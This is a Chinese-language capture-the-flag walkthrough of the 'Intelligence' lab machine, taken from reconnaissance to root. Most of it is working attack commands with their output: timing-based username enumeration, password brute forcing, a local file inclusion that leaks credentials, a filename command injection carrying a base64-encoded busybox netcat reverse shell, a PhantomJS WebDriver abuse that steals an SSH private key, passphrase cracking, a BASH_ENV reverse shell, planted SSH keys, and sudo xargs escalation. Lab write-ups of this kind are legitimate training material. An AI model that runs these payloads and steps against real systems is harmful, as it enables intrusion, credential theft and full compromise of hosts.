Intelligence Agency

image

信息搜集

192.168.43.230

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
┌──(root㉿Eecho)-[~]
└─# rustscan -a 192.168.43.230 -- -A
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
🌍HACK THE PLANET🌍

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.43.230:22
Open 192.168.43.230:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -A" on ip 192.168.43.230
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-15 22:41 +0800
NSE: Loaded 158 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 22:41
Completed NSE at 22:41, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 22:41
Completed NSE at 22:41, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 22:41
Completed NSE at 22:41, 0.00s elapsed
Initiating ARP Ping Scan at 22:41
Scanning 192.168.43.230 [1 port]
Completed ARP Ping Scan at 22:41, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 22:41
Completed Parallel DNS resolution of 1 host. at 22:41, 0.50s elapsed
DNS resolution of 1 IPs took 0.50s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 22:41
Scanning 192.168.43.230 [2 ports]
Discovered open port 22/tcp on 192.168.43.230
Discovered open port 80/tcp on 192.168.43.230
Completed SYN Stealth Scan at 22:41, 0.01s elapsed (2 total ports)
Initiating Service scan at 22:41
Scanning 2 services on 192.168.43.230
Completed Service scan at 22:41, 6.02s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 192.168.43.230
NSE: Script scanning 192.168.43.230.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 22:41
Completed NSE at 22:41, 0.33s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 22:41
Completed NSE at 22:41, 0.01s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 22:41
Completed NSE at 22:41, 0.00s elapsed
Nmap scan report for 192.168.43.230
Host is up, received arp-response (0.00054s latency).
Scanned at 2026-06-15 22:41:36 CST for 7s

PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 10.0p2 Ubuntu 5ubuntu5.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.64
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://intelligence.thl
|_http-server-header: Apache/2.4.64 (Ubuntu)
MAC Address: 08:00:27:EB:10:B5 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
TCP/IP fingerprint:
OS:SCAN(V=7.99%E=4%D=6/15%OT=22%CT=%CU=39927%PV=Y%DS=1%DC=D%G=N%M=080027%TM
OS:=6A300F27%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=109%TI=Z%CI=Z%II=I%
OS:TS=A)OPS(O1=M5B4ST11NW8%O2=M5B4ST11NW8%O3=M5B4NNT11NW8%O4=M5B4ST11NW8%O5
OS:=M5B4ST11NW8%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=
OS:FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW8%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%
OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S
OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
OS:%T=40%CD=S)

Uptime guess: 35.770 days (since Mon May 11 04:13:14 2026)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: default; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.54 ms 192.168.43.230

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 22:41
Completed NSE at 22:41, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 22:41
Completed NSE at 22:41, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 22:41
Completed NSE at 22:41, 0.00s elapsed
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.47 seconds
Raw packets sent: 25 (1.894KB) | Rcvd: 17 (1.366KB)
  • 22 SSH
  • 80 HTTP

写入hosts

image

1
192.168.43.230 intelligence.thl

子域名爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
┌──(root㉿Eecho)-[~]
└─# wfuzz -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u intelligence.thl -H 'Host: FUZZ.intelligence.thl' --hw 28
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
/usr/local/lib/python3.13/dist-packages/requests-2.27.1-py3.13.egg/requests/__init__.py:102: RequestsDependencyWarning:urllib3 (2.6.3) or chardet (5.2.0)/charset_normalizer (3.4.4) doesn't match a supported version!
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://intelligence.thl/
Total requests: 100000

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000000147: 200 47 L 216 W 1929 Ch "old"
000037212: 400 10 L 35 W 299 Ch "*"

Total time: 64.62456
Processed Requests: 100000
Filtered Requests: 99998
Requests/sec.: 1547.399

同样写入hosts文件

1
192.168.43.230 old.intelligence.thl

枚举

基于时间的用户名枚举

提取thl ranking用户名

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
┌──(root㉿kali)-[/opt/tools/st_tools]
└─# vim get_thl_users.py
┌──(root㉿kali)-[/opt/tools/st_tools]
└─# cat get_thl_users.py
import re

input_html_file = "ranking.html" # 从浏览器右键另存为的网页文件https://labs.thehackerslabs.com/ranking
output_txt_file = "thl_users.txt" # 最终保存用户名的数据文件

try:
with open(input_html_file, "r", encoding="utf-8") as file:
html_content = file.read()

# 高容错率正则,无视中间的 class、空格和换行
pattern = r"/hacker/\d+[^>]*?>\s*<span[^>]*?>(.*?)</span>"
usernames = re.findall(pattern, html_content)

# 去重并过滤掉空白字符
unique_users = sorted(
list(set([user.strip() for user in usernames if user.strip()]))
)

with open(output_txt_file, "w", encoding="utf-8") as f:
for user in unique_users:
f.write(user + "\n")

print(
f" [成功] 已成功提取 {len(unique_users)} 个不重复的用户名,并保存至 {output_txt_file}"
)

except FileNotFoundError:
print(
f" [错误] 未找到网页文件 '{input_html_file}'。请确保已将排名页面另存为该文件名并放在同一目录下。"
)
┌──(root㉿kali)-[/opt/tools/st_tools]
└─# python3 get_thl_users.py
[成功] 已成功提取 2925 个不重复的用户名,并保存至 thl_users.txt

https://github.com/bolatbatuhan/Time-Based-User-Enumaration-Tool

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
┌──(root㉿kali)-[/opt/tools/st_tools/User-Enum_Time-Based]
└─# python3 user_enum_timebased.py --url http://intelligence.thl/login.php --wordlist ../thl_users.txt
Calculated Time-Response...
Mean time of response are: 0.0032751499999999997
-------------------------------------------------------------------------------------
[+] User found: Aist4r - Time Response: 0.00821
[+] User found: Aitor - Time Response: 0.006941
[+] User found: AkaOmen - Time Response: 0.007115
[+] User found: Alphabet65 - Time Response: 0.008341
[+] User found: Alsix - Time Response: 0.009167
[+] User found: AzkOsDev - Time Response: 0.008319
[+] User found: B1gTehu3lch3 - Time Response: 0.008482
[+] User found: BLJFCRBRX - Time Response: 0.007178
[+] User found: Dynamikacorp - Time Response: 0.008434
[+] User found: EARHack - Time Response: 0.008673
[+] User found: ECZ02 - Time Response: 0.006841
[+] User found: Findkey - Time Response: 0.008256
[+] User found: Hackson1313 - Time Response: 0.008573
[+] User found: HacksorPro - Time Response: 0.008122
[+] User found: J.Barnechea - Time Response: 0.006526
[+] User found: Kyon74 - Time Response: 0.006824
[+] User found: KyraWanheda - Time Response: 0.008557
[+] User found: Kytixn- - Time Response: 0.007375
[+] User found: LeCando - Time Response: 0.006935
[+] User found: Lebre - Time Response: 0.006563
[+] User found: Loo - Time Response: 0.006687
[+] User found: Lopero79 - Time Response: 0.008371
[+] User found: LordZeven - Time Response: 0.009097
[+] User found: Lukk@$ - Time Response: 0.008684
[+] User found: LukkyDuck - Time Response: 0.009245
[+] User found: MeTaN01a - Time Response: 0.184133
[+] User found: NicCris - Time Response: 0.008331
[+] User found: Nickytv543 - Time Response: 0.008462
[+] User found: RamiroDell - Time Response: 0.008245
[+] User found: Ramon Armet - Time Response: 0.007834
[+] User found: Raul___R1 - Time Response: 0.007934
[+] User found: SATA95 - Time Response: 0.008596
[+] User found: SDH - Time Response: 0.007946
[+] User found: SpyWolf - Time Response: 0.006981
[+] User found: Ulises - Time Response: 0.011819
[+] User found: Xentri - Time Response: 0.00676
[+] User found: Xeoane - Time Response: 0.008659
[+] User found: acasot - Time Response: 0.00676
[+] User found: antonio_cap - Time Response: 0.006555
[+] User found: antonioreque_ - Time Response: 0.008634
[+] User found: black00 - Time Response: 0.006543
[+] User found: black_beans - Time Response: 0.008606
[+] User found: blackfao - Time Response: 0.010539
[+] User found: d4redevil - Time Response: 0.186004
[+] User found: ercik1 - Time Response: 0.00779
[+] User found: eric73 - Time Response: 0.008221
[+] User found: ericstevemd21 - Time Response: 0.009596
[+] User found: fenixia - Time Response: 0.01107
[+] User found: feralar - Time Response: 0.009442
[+] User found: ferranell - Time Response: 0.006844
[+] User found: fetudev - Time Response: 0.012234
[+] User found: ffidel_ - Time Response: 0.007182
[+] User found: fidalgosoftware - Time Response: 0.016978
[+] User found: fl0rkx - Time Response: 0.007371
[+] User found: flakyyz - Time Response: 0.009393
[+] User found: franklin - Time Response: 0.010585
[+] User found: fre4k_k - Time Response: 0.007566
[+] User found: frn_ds - Time Response: 0.007755
[+] User found: g0d - Time Response: 0.009011
[+] User found: g0nxz - Time Response: 0.014958
[+] User found: gafasmas3 - Time Response: 0.008896
[+] User found: galex_. - Time Response: 0.008996
[+] User found: gandalf - Time Response: 0.008038
[+] User found: ganipa93 - Time Response: 0.013206
[+] User found: geekom - Time Response: 0.007281
[+] User found: geerard55 - Time Response: 0.007116
[+] User found: gerion - Time Response: 0.007763
[+] User found: gerowo - Time Response: 0.009305
[+] User found: ghinii - Time Response: 0.010369
[+] User found: ghost39994 - Time Response: 0.009907
[+] User found: giancarlopimi - Time Response: 0.008018
[+] User found: gm4tsy - Time Response: 0.008956
[+] User found: gmunozl - Time Response: 0.00839
[+] User found: goals.iris4243 - Time Response: 0.008098
[+] User found: gomezfran - Time Response: 0.007026
[+] User found: gonzalo-corrales - Time Response: 0.006872
[+] User found: gorka - Time Response: 0.008162
[+] User found: greenlander - Time Response: 0.011506
[+] User found: grey - Time Response: 0.009357
[+] User found: grooti16 - Time Response: 0.010239
[+] User found: gstxx - Time Response: 0.008357
[+] User found: guillekilu - Time Response: 0.008034
[+] User found: gunzf0x - Time Response: 0.006639
[+] User found: h1r4mabbif - Time Response: 0.008563
[+] User found: h3lls1nk1 - Time Response: 0.006853
[+] User found: h4ckv1 - Time Response: 0.007145
[+] User found: hHHH - Time Response: 0.006796
[+] User found: hacendado - Time Response: 0.012537
[+] User found: hachac - Time Response: 0.009852
[+] User found: hackadmin - Time Response: 0.008605
[+] User found: hackblo - Time Response: 0.007209
[+] User found: hackdicap - Time Response: 0.008973
[+] User found: hackercry - Time Response: 0.020993
[+] User found: hackgiver - Time Response: 0.00976
[+] User found: hacklabsec - Time Response: 0.015697
[+] User found: hackwisse - Time Response: 0.006824
[+] User found: hadesv2 - Time Response: 0.009368
[+] User found: hamlet - Time Response: 0.01214
[+] User found: hcanos - Time Response: 0.009434
[+] User found: hebermatias1 - Time Response: 0.01734
[+] User found: hecpabe - Time Response: 0.010011
[+] User found: hectorito99 - Time Response: 0.012216
[+] User found: helll - Time Response: 0.009086
[+] User found: henkosec - Time Response: 0.010661
[+] User found: hermione - Time Response: 0.008442
[+] User found: hossein - Time Response: 0.012325
[+] User found: htienriatla - Time Response: 0.012949
[+] User found: huck - Time Response: 0.012184
[+] User found: huecgms - Time Response: 0.010436
[+] User found: humberto - Time Response: 0.008199
[+] User found: jhackme - Time Response: 0.006775
[+] User found: jhlabs - Time Response: 0.008802
[+] User found: kesmus - Time Response: 0.007554
[+] User found: ludtur - Time Response: 0.007413
[+] User found: lugbeta - Time Response: 0.009706
[+] User found: m4tr1x - Time Response: 0.008553
[+] User found: mendrugo - Time Response: 0.008668
[+] User found: mengyu - Time Response: 0.008134
[+] User found: minidump - Time Response: 0.00666
[+] User found: n35k - Time Response: 0.008609
[+] User found: n3ko - Time Response: 0.008563
[+] User found: nickdevhack - Time Response: 0.006943
[+] User found: nico - Time Response: 0.007165
[+] User found: npcnpc - Time Response: 0.008377
[+] User found: nsa - Time Response: 0.008809
[+] User found: pollofirto - Time Response: 0.006611
[+] User found: ronasuer - Time Response: 0.006757
[+] User found: ronyalca - Time Response: 0.006892
[+] User found: root negro - Time Response: 0.009441
[+] User found: s1m0nc - Time Response: 0.006628
[+] User found: shelby - Time Response: 0.007423
[+] User found: shell.runer - Time Response: 0.008148
[+] User found: shellaqua - Time Response: 0.007225
[+] User found: strakie - Time Response: 0.006667
[+] User found: strangerbox - Time Response: 0.007275
[+] User found: stringmanolo - Time Response: 0.007995
[+] User found: sunempty - Time Response: 0.006524
[+] User found: whoami_elc0ket - Time Response: 0.007519
[+] User found: zeroX - Time Response: 0.007776
[+] User found: zeroit - Time Response: 0.00927

仔细看一下数据:脚本计算出的平均响应基线(Mean time)是 0.0032 秒。而它把 0.006 到 0.012 秒的响应全都误判成了有效用户,实际上这种微小的延迟差完全是正常的网络波动(Jitter)导致的。

但有两个特定账号的响应时间直接拉长了一个数量级:MeTaN01a​和d4redevil​这两个账号的处理时间大约是 185 毫秒,而其他账号只有 ~7-9 毫秒

image

爆破用户密码

密码使用的是rockyou.txt的前5000

image

image

登录到后台

image

image

可以看到一个新的子域名,将它添加到hosts文件

1
192.168.43.230 vulnday0.intelligence.thl

vulnday0子域名目录扫描

访问vulnday0.intelligence.thl 发现存在LFI漏洞

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(root㉿kali)-[/opt/tools/st_tools/User-Enum_Time-Based]
└─# wfuzz -w /usr/share/wordlists/dirb/common.txt -u "http://vulnday0.intelligence.thl/?FUZZ=/etc/passwd" --hc 404 --hh 3692
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://vulnday0.intelligence.thl/?FUZZ=/etc/passwd
Total requests: 4614

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000002834: 200 147 L 287 W 4802 Ch "page"

Total time: 0
Processed Requests: 4614
Filtered Requests: 4613
Requests/sec.: 0

image

提示我们

📧 Your identification credentials have been sent to your registered email address. Please check your inbox and follow the activation instructions.

📧 您的身份验证信息已发送至您注册的邮箱。请检查您的收件箱并按照激活说明操作。

查看邮件/var/mail/metan01a

image

泄露了metan01a用户的凭证metan01a:0p3r4t1on_Bl4ckout!

登录到后台

image

是一个文件上传的页面

image

这里bp扫描出一个rce(扫描的时候需要添加用户名和密码),存在于filename

image

反弹shell

1
filename="123.txt;echo YnVzeWJveCBuYyAxOTIuMTY4LjQzLjYgNzc3NyAtZSAvYmluL2Jhc2gK | base64 -d | bash"

image

提权

www -> suraxddq

上传pspy查看

image

可以看到UID=1002的用户是suraxddq用户执行phantomjs(无头 WebKit 浏览器)

--cookies-file=/tmp/tmpmwImDY​:把浏览器 Cookie 写入临时文件 tmp/tmpmwImDY

--webdriver=127.0.0.1:8080:开启本地 WebDriver 监听 127.0.0.1:8080

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
cat << 'EOF' > /tmp/get_key.sh
#!/bin/bash

# 1. 向本地 PhantomJS 请求新会话,并通过 grep 和 cut 提取出干净的 Session ID
SESSION_DATA=$(curl -sX POST "http://127.0.0.1:8080/session" -H "Content-Type: application/json" -d '{"desiredCapabilities": {"browserName": "phantomjs"}}')
SESSION_ID=$(echo "$SESSION_DATA" | grep -oP '"sessionId":"\K[^"]+')

if [ -z "$SESSION_ID" ]; then
echo "[-] 无法获取 Session ID,请检查端口是否正常。"
exit 1
fi

echo "[+] 成功自动获取并提取 Session ID: $SESSION_ID"

# 2. 发送精准的利用载荷,直接重定向输出到目标文件,彻底避免终端显示产生的损坏
curl -sX POST "http://127.0.0.1:8080/session/$SESSION_ID/phantom/execute" \
-H "Content-Type: application/json" \
-d '{"script":"var fs = require(\"fs\"); return fs.read(\"/home/suraxddq/.ssh/id_rsa\");", "args":[]}' \
| jq -r '.value' > /tmp/id_rsa

if [ -s "/tmp/id_rsa" ] && ! grep -q "null" /tmp/id_rsa; then
echo "[+] 私钥已成功无损写入 /tmp/id_rsa"
# 3. 自动修正私钥权限
chmod 600 /tmp/id_rsa
else
echo "[-] 读取失败,文件可能不存在或无读取权限。"
fi
EOF

# 赋予执行权限并直接运行
chmod +x /tmp/get_key.sh && /tmp/get_key.sh

私钥存在加密需要爆破

将私钥上传到kali上

1
2
3
4
5
6
7
8
9
ww-data@TheHackersLabs-Intelligence:/tmp$ scp id_rsa root@192.168.43.6:/tmp/bbbb
The authenticity of host '192.168.43.6 (192.168.43.6)' can't be established.
ED25519 key fingerprint is SHA256:ZyUbPteDlhKgfFR102PGhJUWNS++vR62HchhPFY2Cfw.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Could not create directory '/var/www/.ssh' (Permission denied).
Failed to add the host to the list of known hosts (/var/www/.ssh/known_hosts).
root@192.168.43.6's password:
id_rsa 100% 3435 2.4MB/s 00:00
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
┌──(root㉿Eecho)-[/tmp/bbbb]
└─# ls -al
total 20
drwxr-xr-x 2 root root 4096 Jun 17 09:57 .
drwxrwxrwt 95 root root 12288 Jun 17 09:46 ..
-rw------- 1 root root 3435 Jun 17 09:57 id_rsa
┌──(root㉿Eecho)-[/tmp/bbbb]
└─# chmod +x id_rsa
┌──(root㉿Eecho)-[/tmp/bbbb]
└─# ssh2john id_rsa > rsa_hash.txt
┌──(root㉿Eecho)-[/tmp/bbbb]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt rsa_hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 24 for all loaded hashes
Will run 24 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
felicidade (id_rsa)
1g 0:00:00:26 DONE (2026-06-17 09:59) 0.03790g/s 189.2p/s 189.2c/s 189.2C/s 2222222..david123
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

横向移动到suraxddq用户

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
ww-data@TheHackersLabs-Intelligence:/tmp$ ssh suraxddq@127.0.0.1 -i /tmp/id_rsa
The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established.
ED25519 key fingerprint is SHA256:K9h9R9Jpba9pAX60xhhz6dTBDVLmzdRjS3efZzu5Sns.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Could not create directory '/var/www/.ssh' (Permission denied).
Failed to add the host to the list of known hosts (/var/www/.ssh/known_hosts).
Enter passphrase for key '/tmp/id_rsa':
Welcome to Ubuntu 25.10 (GNU/Linux 6.17.0-20-generic x86_64)

* Documentation: https://docs.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro


Last login: Wed Jun 17 02:00:08 2026 from 127.0.0.1
suraxddq@TheHackersLabs-Intelligence:~$ id
uid=1002(suraxddq) gid=1002(suraxddq) groups=1002(suraxddq),100(users)
suraxddq@TheHackersLabs-Intelligence:~$


suraxddq -> wvverez

1
2
3
suraxddq@TheHackersLabs-Intelligence:~$ sudo -l
User suraxddq may run the following commands on TheHackersLabs-Intelligence:
(wvverez) NOPASSWD: /opt/script.sh

wvverez用户可以无密码以wvverez权限执行/opt/script.sh

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
suraxddq@TheHackersLabs-Intelligence:/opt$ cat /opt/script.sh
#!/bin/bash

echo "--- VulnDay0 Elite Calculator ---"

# 1. Vérification des arguments
if [ "$#" -ne 2 ]; then
echo "Usage: $0 <num1> <num2>"
exit 1
fi

num1=$1
num2=$2

# --- FILTRES DE SÉCURITÉ (WAF) ---

# A. Interdire les parenthèses (bloque $(command))
if [[ "$num1$num2" == *"("* ]] || [[ "$num1$num2" == *")"* ]]; then
echo "Security Error: Parentheses detected!"
exit 1
fi

# B. Interdire les backticks (bloque `command`)
if [[ "$num1$num2" == *"\`"* ]]; then
echo "Security Error: Backticks detected!"
exit 1
fi

# C. Interdire les espaces (empêche de passer des arguments aux commandes injectées)
if [[ "$num1$num2" == *" "* ]]; then
echo "Security Error: Spaces are not allowed in numbers!"
exit 1
fi

# --- VULNÉRABILITÉ ---
# L'expansion arithmétique évalue récursivement les noms de variables.
# Si num1 contient le nom d'une variable qui contient du code, Bash l'évaluera.
result=$(( num1 + num2 ))

echo "Result: $result"

脚本中使用了 $(( num1 + num2 ))在 Bash 中,算术扩展具有递归求值的特性。如果传入的变量值不是数字,而是一个变量名,Bash 会去寻找该变量的值并继续解析。

WAF过滤了()​ 和 反引号 和空格但是没有过滤字母和特殊环境变量可以利用环境变量的递归特性来实现命令执行

1
2
3
4
5
6
7
8
9
# 1. 创建一个包含反弹 shell 的脚本文件
echo "busybox nc 192.168.43.6 8888 -e sh" > /tmp/shell.sh
chmod +x /tmp/shell.sh

# 2. 设置 BASH_ENV 指向该脚本
export BASH_ENV=/tmp/shell.sh

# 3. 运行脚本,看看是否会被触发
sudo -u wvverez /opt/script.sh 1 1

image

写kali的公钥到wvverez用户下

1
2
3
cd /home/wvverez/.ssh
wget http://192.168.43.6/authorized_keys
chmod 700 authorized_keys

kali ssh到wvverez用户

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(root㉿Eecho)-[/var/www/html]
└─# ssh wvverez@192.168.43.230
The authenticity of host '192.168.43.230 (192.168.43.230)' can't be established.
ED25519 key fingerprint is: SHA256:K9h9R9Jpba9pAX60xhhz6dTBDVLmzdRjS3efZzu5Sns
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.43.230' (ED25519) to the list of known hosts.
Welcome to Ubuntu 25.10 (GNU/Linux 6.17.0-20-generic x86_64)

* Documentation: https://docs.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro


Last login: Mon Apr 6 11:16:50 2026 from 10.0.2.15
wvverez@TheHackersLabs-Intelligence:~$ id
uid=1001(wvverez) gid=1001(wvverez) groups=1001(wvverez),100(users)
wvverez@TheHackersLabs-Intelligence:~$

wvverez -> root

1
2
3
4
wvverez@TheHackersLabs-Intelligence:~$ sudo -l
User wvverez may run the following commands on TheHackersLabs-Intelligence:
(ALL) NOPASSWD: /usr/bin/xargs
wvverez@TheHackersLabs-Intelligence:~$

wvverez用户可以无密码以root权限执行/usr/bin/xargs

GTFBINS上有方案 https://gtfobins.org/gtfobins/xargs/

image

1
2
3
4
wvverez@TheHackersLabs-Intelligence:~$ sudo /usr/bin/xargs -a /dev/null /bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)
#